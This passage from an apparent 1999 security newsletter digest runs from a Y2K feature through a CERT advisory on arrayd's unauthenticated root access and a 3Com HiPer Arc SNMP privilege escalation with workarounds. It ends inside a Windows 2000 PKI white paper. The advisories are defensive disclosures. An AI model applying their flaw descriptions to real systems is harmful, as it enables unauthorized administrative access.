all have big, bald heads and no teeth and do our computing telepathically.

If the Julian day had been used in computers--it could have been since 1963,
when an algorithm was written to perform the conversion automatically--it
would have conserved memory. For microprocessor chips, no conversion
would even have been necessary; they could have been programmed
directly with the Julian date.

This was actually considered.

Thomas Van Flandern, an astronomer at the University of Maryland,
believes that if data processors had adopted the Julian date in 1963, the Y2K
problem would not exist.

In fact, he says, this was once a hot topic among astronomers. They wanted
to recommend it: "There was a lot of discussion about it at the Jet Propulsion
Laboratory," he recalls. "But it broke up into small pools."

Astronomers simply couldn't get together on it, Van Flandern says. Basic
philosophical disputes arose. The movement disintegrated, he says, because
it became polarized. On one side were those who wanted to change all
calculations, such as expressing all angles not in degrees but in radians. On
the other side were people who wanted to change nothing. They fought.
Those simply advocating a Julian date for computers were lost in the din.
Nothing got done.

And the Julian date issue died.

So maybe the Y2K problem is about people after all.

Nixon's the One?

We had one more lead on someone to blame. A last-ditch theory. It was a
good theory. It promised us a fabulous villain. We were excited.

In the early 1970s, Robert Bemer remained bugged, as it were, by the
problem of the two-digit year. He discussed it with acquaintances. One of
these was Edward David, the science adviser to the president of the United
States.

Bemer says he urged David to take the matter to the White House. To the
president himself, if need be.

The president was . . . Richard Nixon.

Clearly, this merited further investigation.

Edward David is 74. He is president of EED Inc., a computer consulting
firm in Bedminster, N.J.

Yes, he recalls, Bemer did discuss the two-digit year with him. And yes,
David agreed with Bemer that it might be a problem. "I know computers,"
David says. "I know how stupid computers are."

And yes, David says, Bemer urged him to take it up at the highest levels.

Did he talk about it with, y'know . . . Nixon?

"No."

So much for the perfect villain.

"I discussed it with my staff," David says. "I discussed it with some other
agencies." He certainly talked to people in the Office of Management and
Budget, he says, and possibly in John Ehrlichman's office, or George
Shultz's. David does not recall names, but he recalls the reaction. People, he
says, "wagged their head sagely and said this problem is simply not on the
radar screen."

In particular, he remembers this fairly universal response:

"It's 30 years in the future. We'll be out of office. Leave it to the civil
servants. They'll still be here."

The Sting of the Bug

It's not my problem. It's not on my watch. He's full of crap. They're jerks.
He won't listen to reason. She's jealous. What's he trying to pull? Blow it out
your airbag.

A people problem.

No one wanted the Millennium Bug. No one hatched it. But no one bottled it
up when they had the chance, and here it is.

It's the same way with warfare: No one wants it. Everyone tries to avoid it.
And here it is.

The Y2K problem is not a computer problem, after all. It was not hard-wired
into the mechanical brains themselves, as some have contended. It was
hard-wired into the human brain. We want to be enlightened. But our
wisdom falls victim to greed and hostility and covetousness and expedience.
It's human nature.

A people problem.

We didn't want a people problem. We wanted a person problem. Someone
to blame.

With Y2K, there is only one fact about which most everyone agrees: It
happened in large measure because computers were invented in the center
of the century. It was an accident of timing.

The first electronic digital computer, ENIAC, was unveiled in 1946. Let's
say this had occurred in 1996. The next century would have been right
around the corner, barreling at us. Yes, some programs would have been
able to ignore it, but the majority would not. Simple mortgages would have
had to accommodate the new century. The balance would be tilted. The
state of the art would have to be the four-digit date, despite the cost. Few
computer experts doubt this.

And if computers had been invented in, say, 1912, the same thing would
have happened in reverse. The birthdays of 80 percent of the American
population would have had to be expressed as part of a previous century.
Arithmetic involving ages, dates of employment, home purchases, anything
that looked remotely into the past would have similarly had to account for the
1800s.

But where does this get us? It's impossible to second-guess the march of
progress. Science proceeds at its own pace. Inventions beget other
inventions. Computers happened when they were ready to happen. Not
before or after.

But why did that moment fall at the center of the century? Can the calendar
itself be second-guessed?

S. Thomas Parker is a professor of history at North Carolina State
University. He is an expert on time measurement. We got his name from an
Internet search. (Computers. They're magic.)

We explain our predicament. We need to find someone to blame for the fact
that the year 2000 is arriving in six months, and not at some other time. In
other words:

Why 2K?

Parker thinks about this.

He consults a book.

And finds us our patsy.

Dennis the Menace?

Most likely, he dressed in coarse brown robes woven from hemp. He was a
Scythian monk who lived in Rome in the 6th century A.D. His name was
Dionysius Exiguus, which translates, roughly, into "Dennis the Short." Dennis
may well have been a small man, but scholars suspect he took the moniker
as a sign of humility.

Parker explains that before Dennis the Short, time was reckoned in various
ways; some figured the date by the number of years since the election of the
current pope. The most common system for counting time, however, was
dating it from the founding of Rome in what is now considered 753 B.C.

Dennis the Short is widely credited with having created the modern
calendar. In A.D. 525, he is said to have proposed dating the Christian era
from the birth of Jesus, and persuaded the papacy this was a good idea.
Dennis calculated this to be the year we now call A.D. 1. It took centuries,
but eventually this system was adopted throughout the Christian world.

But Dennis was wrong, Parker says. He miscalculated. If the Scriptures are
to be believed, Jesus was certainly born during the reign of Herod the First,
the king who ordered the death of all male babies in Judea after hearing of
the birth of a messiah. Herod died in 4 B.C. That means Jesus was born at
least four years earlier than Dennis reckoned. Which means all dates should
be four years later than we think.

Not good enough. It would not have mattered appreciably if computers had
been invented in 1950 instead of 1946.

Parker considers this.

Well, he asks, why did Dennis the Short fix the start of the Christian era at
the birth of Christ? "Resurrection is the true beginning," he says.

Good point. Christ died a Jew. His last supper was a seder. The Christian
era should begin not with his birth but his death.

He is thought to have died around A.D. 34, during the latter years of the
tenure of Pontius Pilate, Judea's Roman prefect.

Shorty turned over the hourglass 34 years too soon!

Let's recalculate time.

A.D. now means what schoolkids have always thought it meant: After
Death. The U.S. was birthed in Philadelphia not in 1776 but 1742. The Civil
War began in 1826. The stock market crashed in 1895.

And ENIAC debuted in . . . 1912.

Pretty soon thereafter, the Department of Defense had a problem. It really,
really, wanted to program its computers using a two-digit year. But gosh
darn it, this just wasn't practical. Half of all servicemen were born in the
previous century. Industry faced similar problems. When they could,
programmers still used a two-digit date. But most could not. The four-digit
year became the rule, not the exception.

Today is Sunday, July 18, 1965. The century will not end for 34 years. But
computers will have been programmed correctly. There will be no
millennium bug.

The Villain, Unmasked

It's not Dick Nixon. It's not Bob Bemer. It's not Ed David. It's not Alan
Greenspan. It's not Bill. It's not Harry.

It's Shorty.

He's the one who screwed up.

Big time.

Special correspondent Bob Massey contributed to this report.


© Copyright 1999 The Washington Post Company
.

@HWA


45.0 CERT ADVISORY CA-99-09
~~~~~~~~~~~~~~~~~~~~~~

by BHZ, Tuesday 20th July 1999 on 1:45 am CET
CERT released new security advisory. "A vulnerability has been discovered in the
default configuration of the Array Services daemon, arrayd. Array Services are used to
manage a cluster of systems. The default configuration file, arrayd.auth, disables
authentication and does not provide adequate protection for systems connected to an
untrusted network". Read the advisory below;

CERT Advisory CA-99-09 Array Services default configuration

Originally released: July 19, 1999
Source: CERT/CC

Systems Affected

* IRIX systems running the Array Services daemon
* UNICOS systems running the Array Services daemon

I. Description

A vulnerability has been discovered in the default configuration of
the Array Services daemon, arrayd. Array Services are used to manage a
cluster of systems. The default configuration file, arrayd.auth,
disables authentication and does not provide adequate protection for
systems connected to an untrusted network.

SGI has published the following document describing the vulnerability
and solutions:

ftp://sgigate.sgi.com/security/19990701-01-P

II. Impact

On systems installed with the default configuration, remote and local
users can execute arbitrary commands as root.

III. Solution

Use "SIMPLE" authentication

Reconfigure arrayd to use "SIMPLE" authentication. For more
information about reconfiguring arrayd, please see the SGI security
bulletin.

Disable the arrayd daemon

If you do not need the capabilities provided by the arrayd daemon, you
may wish to disable the daemon.
_________________________________________________________________

The CERT Coordination Center would like to thank Yuri Volobuev and the
SGI Security Team for their assistance in preparing this advisory.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-99-09-arrayd.html.
______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email.
Our public PGP key is available from http://www.cert.org/CERT_PGP.key.
If you prefer to use DES, please call the CERT hotline for more
information.

Getting security information

CERT publications and other security information are available from
our web site http://www.cert.org/.

To be added to our mailing list for advisories and bulletins, send
email to cert-advisory-request@cert.org and include SUBSCRIBE
your-email-address in the subject of your message.

Copyright 1999 Carnegie Mellon University.
Conditions for use, disclaimers, and sponsorship information can be
found in http://www.cert.org/legal_stuff.html.

* "CERT" and "CERT Coordination Center" are registered in the U.S.
Patent and Trademark Office
______________________________________________________________________

NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie
Mellon University makes no warranties of any kind, either expressed or
implied as to any matter including, but not limited to, warranty of
fitness for a particular purpose or merchantability, exclusivity or
results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from
patent, trademark, or copyright infringement.

Revision History
July 19, 1999: Initial release

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBN5N5q3VP+x0t4w7BAQGo1QQApyCUoV27rxMD4w3bOI9Ylvxk0eFnImVf
XEpRSW74HHHMyPrBC4mltDYjrwX1gXGHR9WK8E9dSGfJju89vFR1IBrp7fZmARCx
YDp1z9XNBAUe/0U2QiW7D/ALfvcVamviSuwAKiZY4ECxL6jtwBF6AYOpEUnOkxYG
tiqdDO3EWjY=
=Uzpa
-----END PGP SIGNATURE-----


@HWA

46.0 Tracking Criminals With New Technology
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

via http://www.securityfocus.com/

21/07/99 14:54

Tracking criminals with new technology
Selina Mitchell

The Federal Government has called for tenders to build a national crime
investigation system.

The government has set aside $50 million over three years to establish
CrimTrac, which it is hoped will make policing easier across the nation.

CrimTrac will be developed in stages, the first being a new and enhanced
National Automated Fingerprint Identification System (NAFIS). This should
be operational before the Sydney Olympics, said Minister for Justice and
Customs, Senator Amanda Vanstone.

It would not be sensible to have an old fingerprint system running when so
many people would be in the country, she said. "Australia's current
fingerprint system has been in place since 1986, and will run out of capacity
in 2001. It relies on printers ink technology scarcely changed in one hundred
years." The new system will support an inkless process that uses electronic
and laser technology, known as livescan.

Following this, a national DNA database and a national child sex offender
register will be set up. The government is also promising fast access to
operational information, including domestic violence orders, missing
person and stolen vehicle information. Vanstone could not give an exact
timetable for implementation, but did say it would be less than a couple of
years.

In order to be useful, all states and territories will need to supply information
to the databases.

All relevant governments supported the new technology and if anyone
wanted to try to find a police commissioner who didn't like the scheme they
would have to pack a very big lunch, Vanstone said.

While private industry has been called on to build the system (providing the
technology and solutions), it will be run by the public sector. A range of legal
and technical safeguards will be employed, she said. CrimTrac's
successful tenderer, and anyone working on it, will be subject to
Commonwealth privacy laws (the Privacy Act and the Crimes Act).

Also, CrimTrac will operate on a need-to-know basis. Access will be
provided to authorised officers only. The access control architecture will
include secure identification, immediate warning of unauthorised users,
access only to relevant data, firewalls and encryption, and audit logs and
trails.

The CrimTrac tender is in two parts: the urgent replacement of NAFIS and
the possible appointment of a long-term systems integrator for the system
to work in partnership with the government and police services. That
partnership (possibly with further tenders) will set up the other pieces of the
CrimTrac system.

It is expected that contracts for the new NAFIS will be signed in November,
and contracts for the systems integrator will be signed a month later. The
request for tender is available from http://www.law.gov.au/.



This article is located at http://www.newswire.com.au/9907/tracki.htm

@HWA

47.0 3Com HiPer Arcs Community Name Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


From http://www.securityfocus.com/

On 3Com HiPer Arc cards (and possibly others using the Pilgrim source
base), it is possible to gain administrative snmp privileges remotely if
you have a valid community string (of any access level). There are
three levels of access in the card, read-only, read-write and
administrative. The community strings are readable to all levels and
makes it possible for an attacker to gain administrative privileges
(needing only to view the community string in the usrSnmpCommAccess
table and others like it). With administrative access, the attacker can
perform a number of malicious activities possibly leading to further
compromise (ie, repopulating the arp cache). There may be other 3com
devices vulnerable to this attack.


There are two workarounds to this problem. The first involves restricting
certain community strings to ip address(es). This is only marginally more
secure and the snmp community strings are still readable. The second
involves not defining community strings on the Arc at all. To do this, you
need the NMC (Network Management Card) to act as a relay to the
HiPer Arc. The NMC's community string needs to be
communitystring@<entitynum> (ie, public@16000), entity being the
location of the Arc (ie, slot 16 = 16000). To send an SNMP command to
the Arc, assuming its in slot 16, and assuming an NMC community string
of "public" for example purposes, you'd use the community string of
"public@16000". The only real drawback to this workaround is the extra
load that is put on the NMC cards (many of which are only 486
processor based...none-too-overpowered), and that the SNMP
operations are slowed down by having to be processed through another
system.


Currently the SecurityFocus staff are not aware of any vendor supplied
patches for this issue. If you feel we are in error or are aware of more
recent information, please mail us at: vuldb@securityfocus.com.


First posted to BugTraq by Jeff Mcadams
<jeffm@iglou.com> on July 20, 1999. Some of the solution
taken directly from Jeff's BugTraq posting.

@HWA

48.0 Aleph One in Tokyo
~~~~~~~~~~~~~~~~~~

Bugtraq moderator Aleph One will be taking his expertise to Tokyo for a three day
seminar on 'exploits and how to stop them' ... here's an excerpt from the itinary

http://www.lac.co.jp/security/seminar/tokyo090899.html


-How to find security holes and how to fix-


Instructor Aleph One (Bugtraq ML moderator) with interpretation
Date September 8-10, 1999
Plac TIME24 Building, AOMI 2-45, KOTO-KU,TOKYO, JAPAN
http://www.lac.co.jp/profile/direction_e.html


Aleph One, a moderator of Bugtraq Mailing List well-known among security
community, will come to teach us how to discover security holes and how to fix them.
Also you will learn 'who' finds vulnerabilities and 'who' misuses them. It is a great
opportunity to ask Aleph questions face to face in Japan. Our SecureNet Service team
will, for those who have technical difficulties, support you during the class.

Contents

Wednesday, September 8
10:00-10:45 What is Bugtraq ML?
10:45-11:45 What are security holes and who find them?
11:45-13:00 Lunch
13:00-17:00 Typical Linux vulnerabilities
9th Sep (Thu)
10:00-11:45 Latest Linux vulnerabilities
11:45-13:00 Lunch
13:00-17:00 Latest Linux vulnerabilities
10th Sep (Fri)
10:00-11:45 Typical SunOS/Solaris vulnerabilities
11:45-13:00 Lunch
13:00-17:00 SunOS/Solaris vulnerabilities


Security holes for this class will focus on :

Remote buffer overflow to get unauthorized privilege
Local buffer overflow to get root privilege
Remote unauthorized login through holes


@HWA

49.0 Windows2000 introduces Public Key Encryption
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From OSALL

PKI Encryption In Windows 2000

OSAll Staff

Microsoft has announced that the upcoming release of Windows 2000 will include
built-in support for public key encryption. The support will actually be integrated
from the ground up in the Windows 2000 security infrastructure.

Windows´ built-in security has been always been notorious for it´s insecurity.
Windows 2000, which is a melding of Windows 9x and Windows NT, is touted by
Microsoft as a more secure operating system. The integration of public key
encryption is another step in that direction, according to Microsoft.

Programs like Pretty Good Privacy already allow for public key encryption, but
they´re not automatic like Microsoft´s seems to be.

Windows 2000´s public key integration is built more as a system for the use of
other software more than to integrate encryption into Windows 2000.

The white paper detailing the integration of public key encryption in Windows 2000
is mirrored in HTML format on OSAll. The only way to receive this white paper
from Microsoft is in self-extracting .DOC format.

http://www.aviary-mag.com/Archive/News/Public_Key_Cryptography_In_Win/PKI_in_Win2k_White_Paper/pki_in_win2k_white_paper.html


White Paper

Abstract

Microsoft® Windows® 2000 introduces a comprehensive public-key infrastructure (PKI) to the
Windows platform. This infrastructure extends the Windows-based public-key (PK) cryptographic
services introduced over the past few years, providing an integrated set of services and administrative
tools for creating, deploying, and managing PK-based applications. This allows application developers
to take advantage of the shared-secret security mechanisms or PK-based security mechanism in
Windows, as appropriate. Enterprises also gain the advantage of being able to manage the
environment and applications with consistent tools and policies.





© 1999 Microsoft Corporation. All rights reserved.

The information contained in this document represents the current view of
Microsoft Corporation on the issues discussed as of the date of publication.
Because Microsoft must respond to changing market conditions, it should not be
interpreted to be a commitment on the part of Microsoft, and Microsoft cannot
guarantee the accuracy of any information presented after the date of publication.

This White Paper is for informational purposes only. MICROSOFT MAKES NO
WARRANTIES, EXPRESS OR IMPLIED, IN THIS DOCUMENT.

Microsoft, ActiveX, Authenticode, Outlook, The BackOffice logo, Windows, and
Windows NT are registered trademarks of Microsoft Corporation.

Other product or company names mentioned herein may be the trademarks of their
respective owners.

Microsoft Corporation One Microsoft Way Redmond, WA 98052-6399 USA

0499

Contents

Introduction1

Concepts2

Public Key Cryptography2

Public-Key Functionality2

Digital Signatures2

Authentication3

Secret Key Agreement via Public Key3

Bulk Data Encryption without Prior Shared Secrets3

Protecting and Trusting Cryptographic Keys4

Certificates4

Certificate Authorities4

Trust and Validation5

Windows 2000 PKI Components6

Certificate Authorities8

Certificate Hierarchies8

Deploying an Enterprise CA9

Trust In Multiple CA Hierarchies11

Enabling Domain Clients12

Generating Keys12

Key Recovery12

Certificate Enrollment13

Renewal13

Using Keys and Certificates13

Recovery14

Roaming15

Revocation15

Trust15

PK Security Policy in Windows 200017

Trusted CA Roots17

Certificate Enrollment and Renewal17

Smart-Card Logon18

Applications Overview19

Web Security19

Secure E-mail20

Digitally Signed Content21

Encrypting File System21

Smart-Card Logon22

IP Security (IPSec)22

Interoperability23

Criteria23

Internet Standards23

Preparing for Windows 2000 PKI26

S/MIME-based E-mail Using Exchange Server26

For More Information27



Introduction

The Microsoft Windows 2000 operating system introduces a comprehensive public-key infrastructure
(PKI) to the Windows platform. This infrastructure extends the Windows-based public-key (PK)
cryptographic services that were introduced over the past few years, providing an integrated set of
services and administrative tools for creating, deploying, and managing PK-based applications. This
allows application developers to take advantage of the shared-secret security mechanisms or
PK-based security mechanism, as appropriate. Enterprises also gain the advantage of being able to
manage the environment and applications with consistent tools and policies.

The remainder of this paper provides an overview of the PKI in Windows 2000.

Concepts

Public Key Cryptography

Cryptography is the science of protecting data. Cryptographic algorithms mathematically combine
input plaintext data and an encryption key to generate encrypted data (ciphertext). With a good
cryptographic algorithm, it is computationally not feasible to reverse the encryption process and
derive the plaintext data, starting with only the ciphertext; some additional data, a decryption key, is
needed to perform the transformation.

In traditional, secret (or symmetric) key cryptography, the encryption and decryption keys are
identical and thus share sensitive data. Parties wishing to communicate with secret-key cryptography
must securely exchange their encryption/decryption keys before they can exchange encrypted data.

In contrast, the fundamental property of public-key (PK) cryptography is that the encryption and
decryption keys are different. Encryption with a public key encryption key is a one-way function;
plaintext turns into ciphertext, but the encryption key is irrelevant to the decryption process. A
different decryption key (related, but not identical, to the encryption key) is needed to turn the
ciphertext back into plaintext. Thus, for PK cryptography, every user has a pair of keys, consisting of
a public key and a private key. By making the public key available, it is possible to enable others to
send you encrypted data that can only be decrypted using your private key. Similarly, you can
transform data using your private key in such a way that others can verify that it originated with you.
This latter capability is the basis for digital signatures, discussed below.

Public-Key Functionality

The separation between public and private keys in PK cryptography has allowed the creation of a
number of new technologies. The most important of these are digital signatures, distributed
authentication, secret-key agreement via public key, and bulk data encryption without prior shared
secrets.

There are a number of well-known PK cryptographic algorithms. Some, such as
Rivest-Shamir-Adleman (RSA) and Elliptic Curve Cryptography (ECC), are general-purpose; they can
support all of the above operations. Others support only a subset of these capabilities. Some
examples include the Digital Signature Algorithm (DSA, which is part of the U.S. government's Digital
Signature Standard, FIPS 186), which is useful only for digital signatures, and Diffie-Hellman (D-H),
which is used for secret key agreement.

The following sections briefly describe the principal uses of PK cryptography. These operations are
described in terms of two users, Bob and Alice. It is assumed that Bob and Alice can exchange
information but do not have any pre-arranged, shared secrets between them.

Digital Signatures

Perhaps the most exciting aspect of public key cryptography is creating and validating digital
signatures. This is based on a mathematical transform that combines the private key with the data to
be signed in such a way that:

Only someone possessing the private key could have created the digital signature.
Anyone with access to the corresponding public key can verify the digital signature.
Any modification of the signed data (even changing only a single bit in a large file) invalidates
the digital signature.

Digital signatures are themselves just data, so they can be transported along with the signed data
that they protect. For example, Bob can create a signed e-mail message to Alice and send the
signature along with the message text, providing Alice the information that is required to verify the
message origin. In addition, digital signatures provide a way to verify that data has not been tampered
with (either accidentally or intentionally) while in transit from the source to the destination. Therefore,
they can be exploited to provide a very secure data-integrity mechanism.

Authentication

PK cryptography provides robust distributed authentication services. Entity authentication guarantees
that the sender of data is the entity that the receiver thinks it is. If Alice receives data from Bob, and
then sends him a challenge encrypted with Bob's public key, Bob then decodes this challenge and
sends it back to Alice, proving that he has access to the private key associated with the public key
that Alice used to issue the challenge. Alice can also send a plaintext challenge to Bob. Bob then
combines the challenge with other information, which is digitally signed. Alice then uses Bob's public
key to verify the signature and prove that Bob has the associated private key. The challenge makes
this message unique and prevents replay attacks by a hostile third party. In either case, this is
known as a proof-of-possession protocol because the sender proves that he has access to a
particular private key.

Secret Key Agreement via Public Key

Another feature of PK cryptography is that it permits two parties to agree on a shared secret, using
public, and nonsecure, communication networks. Basically, Bob and Alice each generate a random
number that forms half of the shared secret key. Bob then sends his half of the secret, encrypted, to
Alice, using her public key. Alice sends her half, encrypted, to Bob with his public key. Each side
can then decrypt the message received from the other party, extract the half of the shared secret that
was generated by the other, and combine the two halves to create the shared secret. Once the
protocol is completed, the shared secret can be used for securing other communications.

Bulk Data Encryption without Prior Shared Secrets

The fourth major technology enabled by PK cryptography is the ability to encrypt bulk data without
the establishment of prior shared secrets. Existing PK algorithms are computationally intensive
relative to secret-key algorithms. This makes them ill suited for encrypting large amounts of data. To
get the advantages of PK cryptography along with efficient bulk encryption, PK and secret-key
technologies are typically combined.

This is accomplished by first selecting a secret-key encryption algorithm and generating a random
session key to use for data encryption. If Bob is sending the message, he first encrypts this session
key, using Alice's public key. The resulting ciphertext key is then sent to Alice along with the
encrypted data. Alice can recover the session key, using her private key, and then use the session
key to decrypt the data.

Protecting and Trusting Cryptographic Keys

In secret-key cryptography, Alice and Bob trust their shared-secret key because they mutually
agreed on it or exchanged it in a secure manner, and each has agreed to keep it stored securely to
prevent access by a malicious third party. In contrast, using PK cryptography, Alice need only
protect her private key and Bob, his private key. The only information they need to share is their
public keys. They need to be able to identify the other's public key with positively, but they need not
keep it secret. This ability to trust the association of a public key with a known entity is critical to the
use of PK cryptography.

Alice might trust Bob's public key because Bob handed it to Alice directly in a secure manner, but
this presupposes that Alice and Bob have had some form of prior secure communication. More likely,
Alice has obtained Bob's public key through a nonsecure mechanism (for example, from a public
directory), so some other mechanism is needed to give Alice confidence that the public key that she
holds claiming to be from Bob really is Bob's public key. One such mechanism is based on
certificates issued by a certificate authority (CA).

Certificates

Certificates provide a mechanism for gaining confidence in the relationship between a public key and
the entity that owns the corresponding private key. A certificate is a digitally signed statement
dealing with a particular subject public key, and the certificate is signed by its issuer (holding another
pair of private and public keys). Typically, certificates also contain other information related to the
subject public key, such as identity information about the entity that has access to the corresponding
private key. Thus, when issuing a certificate, the issuer is attesting to the validity of the binding
between the subject public key and the subject identity information.

The most common form of certificates in use today is based on the ITU-T X.509 standard. This is a
fundamental technology used in the Windows 2000 PKI. It is, however, not the only form of
certificates. Pretty Good Privacy (PGP) secure e-mail, for example, relies on a form of certificates
unique to PGP.

Certificate Authorities

A certificate authority (CA) is an entity or service that issues certificates. A CA acts as a guarantor of
the binding between the subject public key and the subject identity information that is contained in
the certificates it issues. Different CAs may choose to verify that binding through different means, so
it is important to understand the authority's policies and procedures before choosing to trust that
authority to vouch for public keys.

Trust and Validation

The fundamental question facing Alice when she receives a signed message is whether she should
trust that the signature is valid and was made by whoever claimed to make it. Alice can confirm that
the signature is mathematically valid; that is, she can verify the integrity of the signature, using a
known public key. However, Alice must still determine whether the public key used to verify the
signature does, in fact, belong to the entity claiming to have made the signature in the first place. If
Alice does not implicitly trust the public key to be Bob's, she needs to acquire strong evidence that
the key belongs to Bob.

If Alice can locate a certificate, which was issued by a CA that Alice implicitly trusts, for Bob's public
key, Alice can trust that Bob's public key really belongs to Bob. That is, Alice is likely to trust that
she really has Bob's public key if she finds a certificate that:

Has a cryptographically valid signature from its issuer.
Attests to a binding between the name Bob and Bob's public key.
Was issued by an issuer that Alice trusts.

Assuming that Alice finds such a certificate for Bob's public key, she can verify its authenticity, using
the public key of the issuing CA, Ira. However, Alice is now faced with the same dilemma. How does
she know that the public key actually belongs to Ira? Alice now needs to find a certificate attesting to
the identity of Ira and the binding between Ira and Ira's public key.

Ultimately, Alice ends up constructing a chain of certificates leading from Bob and Bob's public key
through a series of CAs and terminating in a certificate issued to someone that Alice implicitly trusts.
Such a certificate is called a trusted root certificate because it forms the root (top node) of a
hierarchy of public keys/identity bindings that Alice accepts as authentic (see section 4.1, Certificate
Hierarchies). When Alice chooses to explicitly trust a particular trusted root certificate, she is
implicitly trusting all the certificates issued by that trusted root, as well as all certificates issued by
any subordinate CA certified by the trusted root.

The set of trusted root certificates that Alice explicitly trusts is the only information that Alice must
acquire in a secure manner. That set of certificates secures Alice's trust system and her belief in the
public-key infrastructure.

Windows 2000 PKI Components

Figure 1 presents a top-level view of the components that make up the Windows 2000 PKI. This is a
logical view and does not imply physical requirements for separate servers; in fact, many functions
may be combined on a single-server system. A key element in the PKI is Microsoft Certificate
Services. This allows you to deploy one or more enterprise CAs. These CAs support certificate
issuance and revocation. They are integrated with Active Directory, which provides CA location
information and CA policy, and allows certificates and revocation information to be published.

The PKI does not replace the existing Windows domain trust-and-authorization mechanisms based
on the domain controller (DC) and Kerberos Key Distribution Center (KDC). Rather, the PKI works
with these services and provides enhancements that allow applications to readily scale to address
extranet and Internet requirements. In particular, PKI addresses the need for scalable and distributed
identification and authentication, integrity, and confidentiality.



Figure 1. Windows 2000 public-key infrastructure components

Support for creating, deploying, and managing PK-based applications is provided uniformly on
workstations and servers running Windows 2000 or Windows NT, as well as workstations running
Windows 95 and Windows 98 operating systems. Figure 2 provides an overview of these services.
Microsoft CryptoAPI is the cornerstone for these services. It provides a standard interface to
cryptographic functionality supplied by installable cryptographic service providers (CSPs). These
CSPs may be software-based or take advantage of cryptographic hardware devices and can support a
variety of algorithms and key strengths. As indicated in the figure, one possible hardware-based CSP
supports smart cards. Some CSPs that ship with Windows 2000 take advantage of the Microsoft
PC/SC-compliant smart card infrastructure (see http://www.Microsoft.com/smartcard/ and
http://www.smartcardsys.com/).

Layered on the cryptographic services is a set of certificate management services. These support
X.509 version 3 standard certificates, providing persistent storage, enumeration services, and
decoding support. Finally, there are services for dealing with industry-standard message formats.
Primarily, these support the PKCS standards and evolving Internet Engineering Task Force

  
(IETF)
Public Key Infrastructure, X.509 (PKIX) draft standards.

Other services take advantage of CryptoAPI to provide additional functionality for application
developers. Secure Channel (schannel) supports network authentication and encryption using the
industry standard TLS and SSL protocols. These may be accessed using the Microsoft WinInet
interface for use with the HTTP protocol (HTTPS) and with other protocols through the SSPI interface.
Authenticode supports object signing and verification. This is used principally for determining origin
and integrity of components downloaded over the Internet, though it may be used in other
environments. Finally, general-purpose smart-card interfaces are supported. These are used to
integrate cryptographic smart cards in an application-independent manner and are the basis for the
smart-card logon support that is integrated with Windows 2000.



Figure 2. Public-key application services

Certificate Authorities

Microsoft Certificate Services, included with Windows 2000, provides a means for an enterprise to
easily establish CAs to support its business requirements. Certificate Services includes a default
policy module that is suitable for issuing certificates to enterprise entities (users, computers, or
services). This includes identification of the requesting entity and validation that the certificate
requested is allowed under the domain PK security policy. This may be easily modified or enhanced
to address other policy considerations or to extend CA support for various extranet or Internet
scenarios. Since Certificate Services is standards-based, it provides broad support for PK-enabled
applications in heterogeneous environments.

Within the PKI, you can easily support both enterprise CAs and external CAs, such as those
associated with other organizations or commercial service providers. This allows an enterprise to
tailor its environment in response to business requirements.

Certificate Hierarchies

The Windows 2000 PKI assumes a hierarchical CA model. This was chosen for its scalability, ease
of administration, and consistency with a growing number of commercial and third-party CA products.
In its simplest form, a CA hierarchy consists of a single CA, though in general, a hierarchy contains
multiple CAs with clearly defined parent-child relationships, as shown in Figure 3. As shown, there
may be multiple unconnected hierarchies of interest. There is no requirement that all CAs share a
common top-level CA parent (or root).

In this model, children are certified by parent CA–issued certificates, which bind a CA's public key to
its identity and other policy-driven attributes. The CA at the top of a hierarchy is generally referred to
as a root CA. The subordinate CAs are often referred to as intermediate or issuing CAs. In this paper,
a CA that issues end-entity certificates is called an issuing CA. Intermediate CA refers to a CA that
is not a root CA, but that only certifies other CAs.



Figure 3. Certificate authority hierarchies

The fundamental advantage of this model is that verification of certificates requires trust in only a
relatively small number of root CAs. At the same time, it provides flexibility in the number of issuing
CAs. There are several practical reasons for supporting multiple issuing CAs. These include:

Usage—Certificates may be issued for a number of purposes (for example, secure e-mail,
network authentication, and so on). The issuing policy for these uses may be distinct, and
separation provides a basis for administering these polices.
Organizational divisions—There may be different policies for issuing certificates, depending
upon an entity's role in the organization. Again, you can create issuing CAs to separate and
administer these policies.
Geographic divisions—Organizations may have entities at multiple physical sites. Network
connectivity between these sites may dictate a requirement for multiple issuing CAs to meet
usability requirements.

Such a CA hierarchy also provides administrative benefits, including:

Flexible configuration of CA security environment (key strength, physical protection, protection
against network attacks, and so on) to tailor the balance between security and usability. For
example, you may choose to employ special-purpose cryptographic hardware on a root CA,
operate it in a physically secure area, or operate it offline. These may be unacceptable for
issuing CAs, due to cost or usability considerations.
Use of fairly frequent updates for issuing CA keys and/or certificates, which are the most
exposed to compromise, without requiring a change to established trust relationships.
The ability to turn off a specific portion of the CA hierarchy without affecting the established
trust relationships. For example, you can easily shut down and revoke an issuing CA
certificate associated with a specific geographic site without affecting other parts of the
organization.

In general, CA hierarchies tend to be static, though this is not a requirement. You can add or delete
issuing CAs under a given root CA fairly easily. You can also merge existing CA hierarchies by
issuing a certificate from one of the root CAs certifying the other root as an intermediate CA.
However, before doing this, you should carefully consider policy inconsistencies that this could
introduce and the impact of depth constraints that may be encoded into existing certificates.

Deploying an Enterprise CA

Deploying Microsoft Certificate Services is a fairly straightforward operation. It is recommended that
you establish the domain prior to creating a CA. Then establish an enterprise root CA, or CAs. The
Certificate Services installation process walks the administrator through this process. Key elements
in this process include:

Selecting the host server—The root CA can run on any Windows 2000 Server platform,
including a domain controller. Factors such as physical security requirements, expected
loading, connectivity requirements, and so on, should be considered in making this decision.
Naming—CA names are bound into their certificates and hence can not change. You should
consider factors such as organizational naming conventions and future requirements to
distinguish among issuing CAs.
